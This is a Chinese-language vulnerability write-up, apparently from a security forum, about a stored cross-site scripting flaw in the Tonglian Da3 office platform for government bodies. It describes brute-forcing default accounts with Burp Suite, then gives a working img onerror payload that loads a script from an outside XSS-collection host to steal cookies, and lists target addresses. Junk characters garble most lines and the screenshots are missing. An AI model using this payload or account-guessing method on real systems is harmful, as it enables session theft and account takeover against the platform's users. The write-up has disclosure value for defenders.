& M+ ]& s% C# J( V) h
9 i" I) ^ [3 F) I 同联Da3协同办公平台后台通用储存型xss漏洞2 R8 _5 k# o; ?( F7 t8 `
7 b: m+ Z. y+ \1 V 5 t2 B& C; V. \0 h2 E$ g1 I
平台简介:
4 [6 X9 ]2 \* T' X5 p2 Z* i& N
( t9 m) y' P8 g; q % ~, T2 O& x/ A: n
2 N; o }7 F$ A; n
" W2 Q9 K# J& U; h! F$ X: j
' h7 U% W7 n! q& F 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 f7 U1 u; |, c$ W7 G7 s" ^
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 L. B) W: i6 f同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!" n9 [2 M$ C/ h
' e' s4 |/ Y) {) C7 T
8 ]1 Y. G/ r/ d1 a6 S
2 k/ o2 W* m4 r6 K u' Q
5 E. Z0 I; J6 K2 o+ l6 z ) X( r: ]; T% p
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* ?) O* a8 ~' j, R
6 V U: N, ?# i7 }3 p* `- N: ?# M
4 Q6 k4 ~6 h- ]: ?2 h
+ C1 n# x {0 ~. F4 n* W
1 v& j$ u$ J5 O" u6 E0 S
( s+ l& q4 z7 n' u http://1.1.1.1:7197/cap-aco/#(案例2-)% _) p* c7 M* P; J8 R! ^
]. F5 |5 m$ e' t
# _3 r r: d0 O$ F- ]& ]1 v http://www.XXOO.com (案例1-官网网站)0 ^) d( u3 J4 j- ]
$ Y4 C* C% l: |& Z. |9 h* }
+ u Z2 W D( j5 x: n' l3 U
漏洞详情:
) U! S. W1 p% E# g7 s4 ^4 e
7 N) P7 P' U: h! m6 o* I
4 {) Z8 J; B( {$ @ 案例一、2 j0 T: Q1 V' F; |; [$ j
* ~; ?/ ?9 z2 M$ T7 I0 X
( G+ S y9 x3 c* l$ p6 x% S
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
; w* }4 X7 Q7 T# k
, R& Z" U$ H/ U1 q7 ]0 S6 e' g
8 ~- \. ~& x `5 b9 T 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:3 V2 K1 R. z8 d0 I; S- q
& ~8 ]* e& @0 m2 a
: E6 x; F7 b' O( J6 j; v& l/ l
& i h+ V4 Y F% z/ G' k6 y' Y7 M# n
, a4 {6 k9 m& G 0 }& e; H1 C4 Y- @, i
3 O/ [4 R6 w* i. q7 O- D
8 C0 I9 j' n: I' O+ T
% @7 N# v' g. t+ l status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
7 k% u% c3 x, z
2 @ W0 [9 C8 ~
4 w; P0 t# p/ Q; m
/ G& ~$ i, ?9 S! ]) r; k5 o
- S. w: B+ C9 a$ _0 |6 m / q0 D3 o: ?- O" V
5 T9 u# f f5 p
9 ]5 B& k+ L& s) F# M; q3 _
- }, r% ~9 _* A! q$ H) T* p) T8 ^! r 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 5 c2 Q9 c2 J6 d
+ {5 o* Q) \# p- T 8 t7 t% _; L2 R2 A
4 H1 i5 R; i% r6 S+ ?9 [: j8 R: @
- u6 @0 t4 Z3 h6 M K& F
( x/ p8 ^5 L1 F9 T$ o <img src=x! p( B7 g4 v5 O' Z7 m5 H1 j
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
/ i3 F# A+ J) e
' K: n# b6 }0 B8 l
/ z! ]6 {. y i7 j8 u
. F3 E( Z5 \# k7 e% Z5 ^
) z+ v/ C# B x* b
9 M) D2 z, U$ ?1 c
然后发送,接收cookie如图: 5 l, M* i& g' l6 P( ~
" { J+ I m7 Z; l( U- |: U
6 B+ x) E/ X" j/ w
* K9 D; l( a: X$ Z5 r* {' D
' B. ~% n% s( n" l
- s' {; F' `# U
& `0 U r7 H5 k; u9 v1 ]
1 H! t+ E9 X: n$ y8 t
3 ]- G! ^9 b4 o2 B$ n
$ z& Y! m) y; ?1 f, I4 O
* j' P! m5 r6 h; J- G$ i' h
! `+ U$ H+ m. j4 m+ G! X! j5 [. w& i 6 p+ `) h+ l; H& Y/ y& _5 I
7 D4 c9 F& h$ y; L3 U( J
0 ]' U3 S, }( H6 J. Z6 \
1 l4 d5 a, {8 K: g9 Q5 n+ Q ~' K
: i) d- m+ G0 R6 q6 ^) U
' I5 q$ D/ ^& c. q3 u) G
) t7 O. }4 w' H8 O# B
$ i( G6 z. C; v! [: R2 ~2 A# y3 ]
& F# Q, l; t# N
3 m$ p% x( H M- p% m2 H
( n6 y4 D f/ ^, ^3 h
0 q0 K& M$ ?3 M) ^! j8 x, G
案例2、
k/ R* X' h5 S3 Z& s) |
6 i {$ k) z% h% U" A4 t
9 ?, l( T/ @- c/ P
前面步骤都一样,下面看效果图:
: d/ g! H2 k* ]$ H6 i
1 d9 o7 p( A% y7 x
1 {' A$ a1 r! d
& b) k. f j, V8 O1 Q& ?- O3 ^
$ R" \" c8 q: g8 I7 l
6 e8 _! S" h! n5 H7 \
3 Z f# i2 y5 r7 Y. W0 A) u
5 s# i9 f6 h/ v; `# q/ I, D! ~+ v
8 V* L/ a5 f4 ]# R( y4 t0 a' }
, y2 q/ e0 N1 \1 c
( [+ ?2 c' l3 u( w4 k2 F; S
& ? x3 C+ B) k5 p: i
( }& w* r8 j2 ^6 b0 B, g
* c, k; \+ J6 u% G
1 Y( Z# y; O1 C! K
$ Z) W \4 D$ D. d$ r
3 |& ^& N; Y( m & O# r6 _9 s, y2 s
0 v, g" l4 a; h1 N- P4 e* I9 \; ?
+ C% j3 C) j7 Q3 q+ z8 L
5 D4 t* }* K0 s) S
' Q( P! K! V, y$ U- {- F+ C
, d+ [, j5 e2 w, n, {. Q
' e% \8 \6 ~% U" y1 Q , v2 Y; z- Q5 |, {* x
4 L* E6 h$ V9 ~' c& {" q
; |: z/ K2 P- r2 u+ J
4 M0 K9 ~" x( v6 X+ F9 F b8 p- F
- D I3 y# E$ w2 x/ |2 ` C) { M! f